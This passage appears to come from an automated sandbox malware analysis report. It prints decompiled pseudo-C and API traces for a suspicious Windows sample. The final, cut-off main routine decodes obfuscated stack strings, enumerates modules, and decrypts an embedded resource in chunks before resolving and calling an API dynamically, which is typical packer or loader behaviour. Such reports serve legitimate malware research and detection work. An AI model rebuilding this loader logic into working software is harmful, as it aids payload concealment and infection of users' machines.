                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 2f4745317c91ce0d1db58eb30ad03852bff464516183b2ec4e69fb8d1fb13d8e
                                                          • Instruction ID: 21cf1bce7c6a814918371ab530f5a892fce8c721486c6f53bf6b632cfe63fa9b
                                                          • Opcode Fuzzy Hash: 2f4745317c91ce0d1db58eb30ad03852bff464516183b2ec4e69fb8d1fb13d8e
                                                          • Instruction Fuzzy Hash: C801D672200615BBDF215E699C68DBB7AACFB85761F000169FE9093148DB7BCD1097A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093680(void* __ecx) {
                                                          				void* _v8;
                                                          				struct tagMSG _v36;
                                                          				int _t8;
                                                          				struct HWND__* _t16;
                                                          
                                                          				_v8 = __ecx;
                                                          				_t16 = 0;
                                                          				while(1) {
                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                          						continue;
                                                          					} else {
                                                          						do {
                                                          							if(_v36.message != 0x12) {
                                                          								DispatchMessageA( &_v36);
                                                          							} else {
                                                          								_t16 = 1;
                                                          							}
                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                          						} while (_t8 != 0);
                                                          						if(_t16 == 0) {
                                                          							continue;
                                                          						}
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t8;
                                                          			}








                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0109369F
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936B2
                                                          • DispatchMessageA.USER32(?), ref: 010936CB
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: b449dd9d9ac278ebfdeedf63df99b65350ef8eee57ac488c8121132b7b9e4c32
                                                          • Instruction ID: 023e10a302e129fffbbeac8a2aa21187943e7d322ffa92950358c72c3c4cf439
                                                          • Opcode Fuzzy Hash: b449dd9d9ac278ebfdeedf63df99b65350ef8eee57ac488c8121132b7b9e4c32
                                                          • Instruction Fuzzy Hash: A8018472A00214BBDF304AAA5C58EEB7ABCFB89B10F004159BA95E6184D5658540DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E010965E8(char* __ecx) {
                                                          				char _t3;
                                                          				char _t10;
                                                          				char* _t12;
                                                          				char* _t14;
                                                          				char* _t15;
                                                          				CHAR* _t16;
                                                          
                                                          				_t12 = __ecx;
                                                          				_t15 = __ecx;
                                                          				_t14 =  &(__ecx[1]);
                                                          				_t10 = 0;
                                                          				do {
                                                          					_t3 =  *_t12;
                                                          					_t12 =  &(_t12[1]);
                                                          				} while (_t3 != 0);
                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, ??);
                                                          					if(_t16 <= _t15) {
                                                          						break;
                                                          					}
                                                          					if( *_t16 == 0x5c) {
                                                          						L7:
                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						 *_t16 = _t10;
                                                          						_t10 = 1;
                                                          					} else {
                                                          						_push(_t16);
                                                          						continue;
                                                          					}
                                                          					L11:
                                                          					return _t10;
                                                          				}
                                                          				if( *_t16 == 0x5c) {
                                                          					goto L7;
                                                          				}
                                                          				goto L11;
                                                          			}










                                                          APIs
                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01092B33), ref: 01096602
                                                          • CharPrevA.USER32(?,00000000), ref: 01096612
                                                          • CharPrevA.USER32(?,00000000), ref: 01096629
                                                          • CharNextA.USER32(00000000), ref: 01096635
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: bba96d325b99aa444eecbb0e1fcd085a99dc7db1264cb7efd12ee0a30d9732ac
                                                          • Instruction ID: 55392f035b6f3b7a8e80cfc838b32a764f12512de4e23d940bec492761a5202b
                                                          • Opcode Fuzzy Hash: bba96d325b99aa444eecbb0e1fcd085a99dc7db1264cb7efd12ee0a30d9732ac
                                                          • Instruction Fuzzy Hash: C4F02872104150AEEF331A2D8CA8DBBBFDCDF8F1A472901EFE8D583101D61B090697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010969B0() {
                                                          				intOrPtr* _t4;
                                                          				intOrPtr* _t5;
                                                          				void* _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          
                                                          				 *0x10981f8 = E01096C70();
                                                          				__set_app_type(E01096FBE(2));
                                                          				 *0x10988a4 =  *0x10988a4 | 0xffffffff;
                                                          				 *0x10988a8 =  *0x10988a8 | 0xffffffff;
                                                          				_t4 = __p__fmode();
                                                          				_t11 =  *0x1098528; // 0x0
                                                          				 *_t4 = _t11;
                                                          				_t5 = __p__commode();
                                                          				_t12 =  *0x109851c; // 0x0
                                                          				 *_t5 = _t12;
                                                          				_t6 = E01097000();
                                                          				if( *0x1098000 == 0) {
                                                          					__setusermatherr(E01097000);
                                                          				}
                                                          				E010971EF(_t6);
                                                          				return 0;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 01096FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01096FC5
                                                          • __set_app_type.MSVCRT ref: 010969C2
                                                          • __p__fmode.MSVCRT ref: 010969D8
                                                          • __p__commode.MSVCRT ref: 010969E6
                                                          • __setusermatherr.MSVCRT ref: 01096A07
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                          • String ID:
                                                          • API String ID: 1632413811-0
                                                          • Opcode ID: 807c2e47dd79f96debab0f784b83747d2336b91f82f25dcc818ae95389768d91
                                                          • Instruction ID: a687e017df6897864b3efb6da79aaa35911c336fb4bf9e7502d1a96d3e20e309
                                                          • Opcode Fuzzy Hash: 807c2e47dd79f96debab0f784b83747d2336b91f82f25dcc818ae95389768d91
                                                          • Instruction Fuzzy Hash: 31F0F8B560830ACFCB78AB38E5397053BA1FB46321B10864AE4E1863D8CB3F8154DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:3.5%
                                                          Dynamic/Decrypted Code Coverage:31.1%
                                                          Signature Coverage:15.1%
                                                          Total number of Nodes:351
                                                          Total number of Limit Nodes:34

                                                          Control-flow Graph

                                                          C-Code - Quality: 77%
                                                          			E004019F0(void* __edx, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				void* _t337;
                                                          				void* _t340;
                                                          				int _t341;
                                                          				CHAR* _t344;
                                                          				intOrPtr* _t349;
                                                          				int _t350;
                                                          				long _t352;
                                                          				signed int _t354;
                                                          				intOrPtr _t358;
                                                          				long _t359;
                                                          				CHAR* _t364;
                                                          				struct HINSTANCE__* _t365;
                                                          				CHAR* _t366;
                                                          				_Unknown_base(*)()* _t367;
                                                          				int _t368;
                                                          				int _t369;
                                                          				int _t370;
                                                          				intOrPtr* _t376;
                                                          				int _t378;
                                                          				intOrPtr _t379;
                                                          				intOrPtr* _t381;
                                                          				int _t383;
                                                          				intOrPtr* _t384;
                                                          				int _t385;
                                                          				int _t396;
                                                          				int _t399;
                                                          				int _t402;
                                                          				int _t405;
                                                          				intOrPtr* _t407;
                                                          				int _t413;
                                                          				int _t415;
                                                          				void* _t421;
                                                          				int _t422;
                                                          				int _t424;
                                                          				intOrPtr* _t428;
                                                          				intOrPtr _t429;
                                                          				intOrPtr* _t431;
                                                          				int _t432;
                                                          				int _t435;
                                                          				intOrPtr* _t437;
                                                          				int _t438;
                                                          				intOrPtr* _t439;
                                                          				int _t440;
                                                          				int _t442;
                                                          				signed int _t448;
                                                          				signed int _t451;
                                                          				signed int _t452;
                                                          				int _t469;
                                                          				int _t471;
                                                          				int _t482;
                                                          				signed int _t486;
                                                          				intOrPtr* _t488;
                                                          				intOrPtr* _t490;
                                                          				intOrPtr* _t492;
                                                          				intOrPtr _t493;
                                                          				void* _t494;
                                                          				struct HRSRC__* _t497;
                                                          				void* _t514;
                                                          				int _t519;
                                                          				intOrPtr* _t520;
                                                          				void* _t524;
                                                          				void* _t525;
                                                          				struct HINSTANCE__* _t526;
                                                          				intOrPtr _t527;
                                                          				void* _t531;
                                                          				void* _t535;
                                                          				struct HRSRC__* _t536;
                                                          				intOrPtr* _t537;
                                                          				intOrPtr* _t539;
                                                          				int _t542;
                                                          				int _t543;
                                                          				intOrPtr* _t547;
                                                          				intOrPtr* _t548;
                                                          				intOrPtr* _t549;
                                                          				intOrPtr* _t550;
                                                          				void* _t551;
                                                          				intOrPtr _t552;
                                                          				int _t555;
                                                          				void* _t556;
                                                          				void* _t557;
                                                          				void* _t558;
                                                          				void* _t559;
                                                          				void* _t560;
                                                          				void* _t561;
                                                          				void* _t562;
                                                          				intOrPtr* _t563;
                                                          				void* _t564;
                                                          				void* _t565;
                                                          				void* _t566;
                                                          				void* _t567;
                                                          
                                                          				_t567 = __eflags;
                                                          				_t494 = __edx;
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                          				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                          				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                          				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                          				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                          				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                          				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                          				 *((char*)(_t556 + 0x21)) = 0x20;
                                                          				 *((char*)(_t556 + 0x22)) = 0x64;
                                                          				 *((char*)(_t556 + 0x23)) = 6;
                                                          				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                          				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                          				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                          				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                          				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                          				 *((char*)(_t556 + 0x29)) = 0xee;
                                                          				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                          				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                          				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                          				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                          				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                          				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                          				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                          				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                          				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                          				 *((char*)(_t556 + 0x33)) = 0x78;
                                                          				 *((char*)(_t556 + 0x34)) = 0x98;
                                                          				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                          				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                          				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                          				 *((char*)(_t556 + 0x38)) = 0;
                                                          				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                          				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                          				_t557 = _t556 + 0xc;
                                                          				if(_t337 == 0x41b2a0) {
                                                          					L80:
                                                          					__eflags = 0;
                                                          					return 0;
                                                          				} else {
                                                          					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                          					_t525 = _t340;
                                                          					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                          					 *((char*)(_t557 + 0x64)) = 0xce;
                                                          					 *((char*)(_t557 + 0x65)) = 0x27;
                                                          					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                          					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                          					 *((char*)(_t557 + 0x68)) = 0x95;
                                                          					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                          					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                          					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                          					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                          					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                          					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                          					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                          					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                          					 *((char*)(_t557 + 0x71)) = 0x98;
                                                          					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                          					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                          					 *((char*)(_t557 + 0x75)) = 0x87;
                                                          					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                          					 *((char*)(_t557 + 0x77)) = 0xf;
                                                          					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x79)) = 0x76;
                                                          					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                          					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                          					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                          					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                          					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                          					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                          					 *((char*)(_t557 + 0x80)) = 0x98;
                                                          					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                          					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                          					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                          					 *((char*)(_t557 + 0x84)) = 0;
                                                          					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                          					 *((char*)(_t557 + 0x19)) = 0x38;
                                                          					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                          					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                          					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                          					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                          					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                          					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                          					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                          					 *((char*)(_t557 + 0x21)) = 0x29;
                                                          					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                          					 *((char*)(_t557 + 0x23)) = 0x56;
                                                          					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                          					 *((char*)(_t557 + 0x25)) = 0x98;
                                                          					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                          					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                          					 *((char*)(_t557 + 0x29)) = 0x87;
                                                          					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                          					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                          					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                          					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                          					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                          					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                          					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                          					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                          					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                          					 *((char*)(_t557 + 0x33)) = 0x78;
                                                          					 *((char*)(_t557 + 0x34)) = 0x98;
                                                          					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                          					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                          					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                          					 *((char*)(_t557 + 0x38)) = 0;
                                                          					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                          					if(_t341 == 0) {
                                                          						L38:
                                                          						CloseHandle(_t525);
                                                          						_t526 = GetModuleHandleA(0);
                                                          						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                          						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                          						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                          						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                          						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                          						 *((char*)(_t557 + 0x21)) = 0x44;
                                                          						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                          						 *((char*)(_t557 + 0x23)) = 0x23;
                                                          						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                          						 *((char*)(_t557 + 0x25)) = 0x45;
                                                          						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                          						 *((char*)(_t557 + 0x27)) = 0x56;
                                                          						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                          						 *((char*)(_t557 + 0x29)) = 0x98;
                                                          						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                          						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                          						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                          						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                          						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                          						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                          						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                          						 *((char*)(_t557 + 0x31)) = 0x76;
                                                          						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                          						 *((char*)(_t557 + 0x33)) = 0x34;
                                                          						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                          						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                          						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                          						 *((char*)(_t557 + 0x37)) = 0x78;
                                                          						 *((char*)(_t557 + 0x38)) = 0x98;
                                                          						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                          						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                          						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                          						 *((char*)(_t557 + 0x3c)) = 0;
                                                          						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                          						_t558 = _t557 + 8;
                                                          						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                          						 *(_t558 + 0x50) = _t536;
                                                          						_t551 = LoadResource(_t526, _t536);
                                                          						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                          						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                          						_push(0x40022);
                                                          						_t537 = _t349; // executed
                                                          						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                          						_t559 = _t558 + 8;
                                                          						 *(_t559 + 0x34) = _t350;
                                                          						__eflags = _t350;
                                                          						if(_t350 == 0) {
                                                          							 *(_t559 + 0x50) = 0;
                                                          						} else {
                                                          							E0040BA30(_t526, _t350, 0, 0x40022);
                                                          							_t486 =  *(_t559 + 0x40);
                                                          							_t559 = _t559 + 0xc;
                                                          							 *(_t559 + 0x50) = _t486;
                                                          						}
                                                          						E00401300( *(_t559 + 0x50));
                                                          						_t497 =  *(_t559 + 0x48);
                                                          						_t352 = SizeofResource(_t526, _t497);
                                                          						 *(_t559 + 0x40) = _t352;
                                                          						asm("cdq");
                                                          						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                          						__eflags = _t354;
                                                          						if(_t354 > 0) {
                                                          							_t519 =  *(_t559 + 0x3c);
                                                          							_t482 = _t537 - _t519;
                                                          							__eflags = _t482;
                                                          							 *(_t559 + 0x34) = _t519;
                                                          							 *(_t559 + 0x88) = _t482;
                                                          							 *(_t559 + 0x38) = _t354;
                                                          							do {
                                                          								_t424 =  *(_t559 + 0x34);
                                                          								_push( *(_t559 + 0x88) + _t424);
                                                          								_push(0x400);
                                                          								_push(_t424);
                                                          								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                          								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                          								_t179 = _t559 + 0x38;
                                                          								 *_t179 =  *(_t559 + 0x38) - 1;
                                                          								__eflags =  *_t179;
                                                          							} while ( *_t179 != 0);
                                                          						}
                                                          						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                          						__eflags = _t448;
                                                          						if(_t448 < 0) {
                                                          							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                          							__eflags = _t448;
                                                          						}
                                                          						__eflags = _t448;
                                                          						if(_t448 > 0) {
                                                          							_t421 =  *(_t559 + 0x40) - _t448;
                                                          							_push(_t421 + _t537);
                                                          							_push(_t448);
                                                          							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                          							__eflags = _t422;
                                                          							_push(_t422);
                                                          							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                          						}
                                                          						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                          						_t560 = _t559 + 0xc;
                                                          						FreeResource(_t551);
                                                          						_t552 =  *_t537;
                                                          						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                          						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                          						_t561 = _t560 + 4;
                                                          						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                          						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                          						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                          						_t192 = _t537 + 4; // 0x4
                                                          						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                          						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                          						_t528 = _t527 + 0xe;
                                                          						 *((char*)(_t561 + 0x34)) = 0xce;
                                                          						 *((char*)(_t561 + 0x35)) = 0x27;
                                                          						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                          						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                          						 *((char*)(_t561 + 0x38)) = 0x95;
                                                          						 *((char*)(_t561 + 0x39)) = 0x21;
                                                          						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                          						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                          						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                          						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                          						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                          						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                          						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                          						 *((char*)(_t561 + 0x41)) = 0x98;
                                                          						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                          						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                          						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                          						 *((char*)(_t561 + 0x45)) = 0x87;
                                                          						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                          						 *((char*)(_t561 + 0x47)) = 0xf;
                                                          						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                          						 *((char*)(_t561 + 0x49)) = 0x76;
                                                          						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                          						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                          						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                          						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                          						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                          						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                          						 *((char*)(_t561 + 0x50)) = 0x98;
                                                          						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                          						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                          						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                          						 *((char*)(_t561 + 0x54)) = 0;
                                                          						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                          						_t562 = _t561 + 0x24;
                                                          						_t365 = LoadLibraryA(_t364); // executed
                                                          						_t538 = _t365;
                                                          						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                          						 *((char*)(_t562 + 0x11)) = 0x18;
                                                          						 *((char*)(_t562 + 0x12)) = 0xad;
                                                          						 *((char*)(_t562 + 0x13)) = 0x36;
                                                          						 *((char*)(_t562 + 0x14)) = 0x95;
                                                          						 *((char*)(_t562 + 0x15)) = 0x21;
                                                          						_t451 = _t562 + 0x134;
                                                          						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                          						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                          						 *((char*)(_t562 + 0x20)) = 0xda;
                                                          						 *((char*)(_t562 + 0x21)) = 0xc;
                                                          						 *((char*)(_t562 + 0x22)) = 0x55;
                                                          						 *((char*)(_t562 + 0x23)) = 0x25;
                                                          						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                          						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                          						 *((char*)(_t562 + 0x26)) = 0x35;
                                                          						 *((char*)(_t562 + 0x27)) = 0x97;
                                                          						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                          						 *((char*)(_t562 + 0x29)) = 0x87;
                                                          						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                          						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                          						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                          						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                          						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                          						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                          						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                          						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                          						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                          						 *((char*)(_t562 + 0x33)) = 0x78;
                                                          						 *((char*)(_t562 + 0x34)) = 0x98;
                                                          						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                          						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                          						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                          						 *((char*)(_t562 + 0x38)) = 0;
                                                          						_t366 = E00401650(_t562 + 0x14, _t451);
                                                          						_t563 = _t562 + 8;
                                                          						_t367 = GetProcAddress(_t365, _t366);
                                                          						__eflags = _t367;
                                                          						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                          						__eflags = _t452;
                                                          						 *(_t563 + 0x47) = _t452 == 0;
                                                          						 *0x423480 = _t367;
                                                          						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                          						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                          						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                          						 *(_t563 + 0x58) = 0;
                                                          						 *(_t563 + 0x54) = 0;
                                                          						__eflags = _t452;
                                                          						if(_t452 != 0) {
                                                          							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                          							__eflags = _t368;
                                                          							if(_t368 >= 0) {
                                                          								__eflags =  *(_t563 + 0x47);
                                                          								if( *(_t563 + 0x47) == 0) {
                                                          									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
